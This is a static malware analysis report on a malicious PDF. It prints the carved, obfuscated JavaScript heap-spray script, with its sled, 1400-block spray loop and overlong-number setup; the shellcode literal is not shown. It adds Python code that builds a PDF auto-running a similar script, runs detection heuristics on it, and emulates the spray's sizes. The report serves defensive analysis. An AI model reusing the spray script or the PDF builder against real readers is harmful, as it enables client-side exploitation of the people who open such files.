Malicious PDF — malware analysis report

Static analysis result for SHA-256 39eeb1a9bf66962f…

Verdict: MALICIOUS
File type: PDF
Size: 1.6 KB
First seen: 2026-05-10
MD5: 4c038485cbea646dc3357ddc4adbc073
SHA-1: fe7532680cf641b5cf8b51aab82dbf55ffab369e
SHA-256: 39eeb1a9bf66962f7182c7593c204a3f9297a1dfc0e4a020f029493265cae378
Risk score: 148

Malware Insights

MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript
T1203 Exploitation for Client Execution

The PDF carries embedded JavaScript (heuristics PDF_JAVASCRIPT and PDF_JS). The carved script is obfuscated: each string literal is built by regex-replacing a placeholder token with '%u' and then passed through unescape(), which turns every %uXXXX into one 16-bit code unit. What the preview shows is a heap spray, not a downloader. The first two literals decode to runs of 0x0a0a, a value that works both as a NOP-like sled and, repeated as 0x0a0a0a0a, as the address such exploits commonly jump to; the third literal, whose contents are not shown in the preview, is appended after the sled and is where the shellcode would sit. Each block is padded with the sled pattern until it is 20 code units short of 0x40000 (0x80000 bytes, the slack presumably leaving room for the string header so that every block fills one allocation), and 1400 copies are stored in an array, roughly 700 MB of sprayed memory. The preview ends while the script builds an overlong number by appending 232 zeros to '0x145ad675de36e1' and calling parseInt on it; the API call that consumes that value, and therefore the triggered vulnerability, lies outside the shown lines, so no CVE and no family is assigned. Nothing in the preview fetches a URL or writes a file; any second stage would have to be carried inside the sprayed shellcode.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • PDF_JAVASCRIPT (low, 2 related findings): JavaScript action
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS_EXPLOIT_CLUSTER (critical): PDF JavaScript exploit cluster
    PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    return unescape(fsjwfwf);
  • PDF_JS (low): Embedded JS stream
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • EXTRACTED_FILE_STATIC_TRIAGE (info): Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
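The checks listed above can be reproduced outside the platform. The following Python script is an added example, not the analysis platform's code: it builds a small constructed PDF whose /OpenAction runs a FlateDecode-compressed /JS stream written in the same replace()/unescape() idiom as the carved artifact (with a short stand-in for the payload), carves the stream, folds the replace chains into the literals they produce, and applies equivalents of the PDF_JAVASCRIPT, PDF_JS and exploit-cluster checks. The PDF_JS_* finding names inside triage_script and its severity rule are this example's own, modelled on the cluster heuristic, not the platform's rule set.

```python
"""Static triage of a PDF for the JavaScript indicators listed above.
Added example, not the analysis platform's code; the PDF and the script
inside it are constructed to resemble the carved artifact."""
import re
import zlib

# Constructed script: same replace()/unescape() idiom, NOP sled and spray loop
# as the carved artifact, with a short stand-in instead of the real payload.
SAMPLE_JS = (
    "function d(s){return unescape(s);}\n"
    "var sled = 'ARG0A0AARG0A0AARG0A0AARG0A0A'.replace(/ARG/igm,'%u');\n"
    "var sc = 'Z9X9XZ9X9XZCCCC'.replace(/Z/igm,'%u').replace(/X/igm,'0');\n"
    "sled = d(sled); sc = d(sc);\n"
    "var spray = new Array();\n"
    "for (i = 0; i < 1400; i++){ spray[i] = sled + sc; }\n"
)

def build_sample_pdf(js: str) -> bytes:
    """Wrap a script in a FlateDecode /JS stream that /OpenAction runs on open."""
    body = zlib.compress(js.encode("latin-1"))
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(body)
        + body + b"\nendstream",
    ]
    pdf = b"%PDF-1.6\n"
    for num, obj in enumerate(objs, 1):
        pdf += b"%d 0 obj\n" % num + obj + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%EOF\n"

OBJ_STREAM_RE = re.compile(
    rb"(\d+) 0 obj\s*<<([^>]*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)

def carve_js_streams(pdf: bytes) -> dict:
    """Return {object number: script text} for every stream a /JS key points at."""
    js_refs = {int(n) for n in re.findall(rb"/JS\s+(\d+)\s+0\s+R", pdf)}
    scripts = {}
    for m in OBJ_STREAM_RE.finditer(pdf):
        num, dictionary, data = int(m.group(1)), m.group(2), m.group(3)
        if num in js_refs:
            if b"/FlateDecode" in dictionary:
                data = zlib.decompress(data)
            scripts[num] = data.decode("latin-1")
    return scripts

REPLACE_IDIOM_RE = re.compile(
    r"'([^']*)'\.replace\(/([A-Za-z0-9]+)/([igm]*),'([^']*)'\)")

def resolve_replace_idiom(js: str) -> str:
    """Fold 'lit'.replace(/pat/igm,'rep') chains into the literal they produce."""
    def fold(m):
        lit, pat, flags, rep = m.groups()
        return "'" + re.sub(pat, lambda _: rep, lit,
                            flags=re.I if "i" in flags else 0) + "'"
    for _ in range(16):                    # bounded: chained calls fold one per pass
        folded = REPLACE_IDIOM_RE.sub(fold, js)
        if folded == js:
            break
        js = folded
    return js

UNICODE_ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})")
SLED_RE = re.compile(r"(%u[0-9a-fA-F]{4})\1{3,}")   # same code unit 4+ times in a row
DECODER_RE = re.compile(r"\b(eval|unescape|fromCharCode)\b")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")
SPRAY_LOOP_RE = re.compile(r"for\s*\([^)]*<\s*(\d+)")

def decode_unicode_escapes(s: str) -> bytes:
    """Bytes that unescape('%uXXXX...') occupies in memory (UTF-16LE code units)."""
    return b"".join(int(h, 16).to_bytes(2, "little")
                    for h in UNICODE_ESC_RE.findall(s))

def triage_script(js: str) -> dict:
    """Static checks on one script; the PDF_JS_* names and the severity rule are
    this example's own, modelled on the report's exploit-cluster heuristic."""
    resolved = resolve_replace_idiom(js)
    sleds = [decode_unicode_escapes(m.group(0)) for m in SLED_RE.finditer(resolved)]
    loop_counts = [int(n) for n in SPRAY_LOOP_RE.findall(js)]
    fired = {
        "PDF_JS_DECODER_TOKEN": bool(DECODER_RE.search(js)),
        "PDF_JS_LONG_B64_BLOB": bool(B64_BLOB_RE.search(js)),
        "PDF_JS_NOP_SLED": bool(sleds),
        "PDF_JS_SPRAY_LOOP": "new Array" in js and any(n >= 1000 for n in loop_counts),
    }
    cluster = fired["PDF_JS_DECODER_TOKEN"] and (
        fired["PDF_JS_NOP_SLED"] or fired["PDF_JS_SPRAY_LOOP"])
    return {"fired": [k for k, v in fired.items() if v],
            "sled_bytes": sleds[0] if sleds else b"",
            "severity": "critical" if cluster else "low"}

def triage_pdf(pdf: bytes) -> dict:
    """PDF_JAVASCRIPT / PDF_JS surface checks plus triage of each carved script."""
    return {
        "PDF_JAVASCRIPT": b"/JavaScript" in pdf,
        "PDF_JS": b"/JS" in pdf,
        "scripts": {n: triage_script(js) for n, js in carve_js_streams(pdf).items()},
    }

if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf(SAMPLE_JS)))
```

The carver is deliberately simple (regex over objects, FlateDecode only) so the interesting part, folding the replace() chains before looking for %u escapes, stays visible; on a real sample the static decoder sees no '%u' at all until that step is done, which is exactly why the platform scores the unescape() call rather than the escape sequences.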

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: javascript_obj111111_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 111111 at offset 0x160
Size: 2543 bytes
SHA-256: 08493f26dadf6318f979b646e4c40aef3a6572ea9d7f71ba3cb16f2e8fc6f60a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s) and 1 long base64-like blob(s). The 2543-byte stream is larger than the 1.6 KB PDF that contains it, so the stream is stored compressed inside the file and only becomes readable after inflation.
Preview script
First 1,000 lines of the extracted script
function yshsiqx(fsjwfwf)
{
return unescape(fsjwfwf);
}
var blksjs = 'ARG0A0AARG0A0AARG0A0AARG0A0A'.replace(/ARG/igm,'%u');
var bvcues1 = 'ARG0A0AARG0A0A'.replace(/ARG/igm,'%u');
var ewkvxv7 = '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'.replace(/Z/igm,'%u').replace(/X/igm,'0');
blksjs=yshsiqx(blksjs);
bvcues1=yshsiqx(bvcues1);
ewkvxv7=yshsiqx(ewkvxv7);
knhphta = blksjs + ewkvxv7;
izypgrd = 20 + knhphta.length;
while (bvcues1.length < izypgrd){bvcues1 += bvcues1;}
fueqeq = bvcues1.substr(0, izypgrd);
xpepds8 = bvcues1.substr(0, bvcues1.length - izypgrd);
while (xpepds8.length + izypgrd < 0x40000){xpepds8 = xpepds8 + xpepds8 + fueqeq;}
frdwh = new Array();
for (dvhwcwa = 0; dvhwcwa < 1400; dvhwcwa ++ ){frdwh[dvhwcwa] = xpepds8 + knhphta;}
var kocwfty2 = '0x145ad675de36e1'
for (dvhwcwa = 1; dvhwcwa <= 232; dvhwcwa ++ ){kocwfty2 = kocwfty2 + '0';}
kocwfty2=parseInt(kocwfty2);
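To measure what the spray does without opening the file in a reader, here is an added Python emulation of the steps shown above, using the script's own variable names; it is not code from the sample or from the platform. js_unescape is a minimal stand-in for the JavaScript unescape() function, and the payload_escaped argument is a constructed placeholder for the third literal, whose contents are not reproduced in the preview. Going beyond the single instance on the page, build_spray can be run for any payload length, which shows that the block size is always 20 code units short of 0x40000, and overlong_number shows that the value assembled in the last three lines is a huge but finite double.

```python
"""Emulation of the heap-spray construction in the carved script.
Added example, not code from the sample or the platform; it reproduces the
visible steps in Python so the sprayed sizes can be measured without running
the JavaScript in a PDF reader."""

def js_unescape(s: str) -> str:
    """Minimal stand-in for JavaScript unescape(): '%uXXXX' becomes one UTF-16
    code unit and '%XX' one Latin-1 character; anything else is copied."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and s[i + 1:i + 2] == "u":
            out.append(chr(int(s[i + 2:i + 6], 16)))
            i += 6
        elif s[i] == "%":
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def utf16_bytes(s: str) -> bytes:
    """Memory layout of a JS string: two little-endian bytes per code unit."""
    return s.encode("utf-16-le")

def build_spray(payload_escaped: str, block_target: int = 0x40000,
                copies: int = 1400) -> dict:
    """Same steps as the script, with its variable names.  payload_escaped is a
    constructed '%u' string standing in for the literal the preview omits."""
    blksjs = "ARG0A0AARG0A0AARG0A0AARG0A0A".replace("ARG", "%u")   # sled seed
    bvcues1 = "ARG0A0AARG0A0A".replace("ARG", "%u")                 # padding seed
    blksjs = js_unescape(blksjs)            # four 0x0a0a code units
    bvcues1 = js_unescape(bvcues1)          # two 0x0a0a code units
    ewkvxv7 = js_unescape(payload_escaped)  # the shellcode literal
    knhphta = blksjs + ewkvxv7              # sled + shellcode, the tail of every block
    izypgrd = 20 + len(knhphta)             # tail length plus 20 code units of slack
    while len(bvcues1) < izypgrd:           # grow padding to a power of two >= izypgrd
        bvcues1 += bvcues1
    fueqeq = bvcues1[:izypgrd]
    xpepds8 = bvcues1[:len(bvcues1) - izypgrd]
    while len(xpepds8) + izypgrd < block_target:   # double until one block is full
        xpepds8 = xpepds8 + xpepds8 + fueqeq
    block = xpepds8 + knhphta               # frdwh[i] holds one copy of this
    return {
        "block_chars": len(block),
        "block_bytes": len(utf16_bytes(block)),
        "sled_byte": utf16_bytes(blksjs)[:1],
        "payload_offset": len(utf16_bytes(xpepds8 + blksjs)),
        "total_bytes": copies * len(utf16_bytes(block)),
    }

def overlong_number() -> float:
    """parseInt('0x145ad675de36e1' + 232 zeros): a hex literal of 246 digits,
    which JavaScript rounds to the nearest double (about 1.3e295, still finite)."""
    return float(int("0x145ad675de36e1" + "0" * 232, 16))

if __name__ == "__main__":
    r = build_spray("%u9090%u9090%ucccc")   # constructed stand-in payload
    print("block: %d code units, %d bytes" % (r["block_chars"], r["block_bytes"]))
    print("spray: %d copies, %.0f MB" % (1400, r["total_bytes"] / 2**20))
    print("overlong number: %e" % overlong_number())
```

Because the padding seed is doubled to a power of two before the block loop starts, len(xpepds8) + izypgrd lands exactly on block_target, so every block is block_target - 20 code units regardless of the payload; the 20-unit slack is what makes each string fill one 0x80000-byte allocation, and the payload always sits at the very end of the block behind a sled that spans the rest of it.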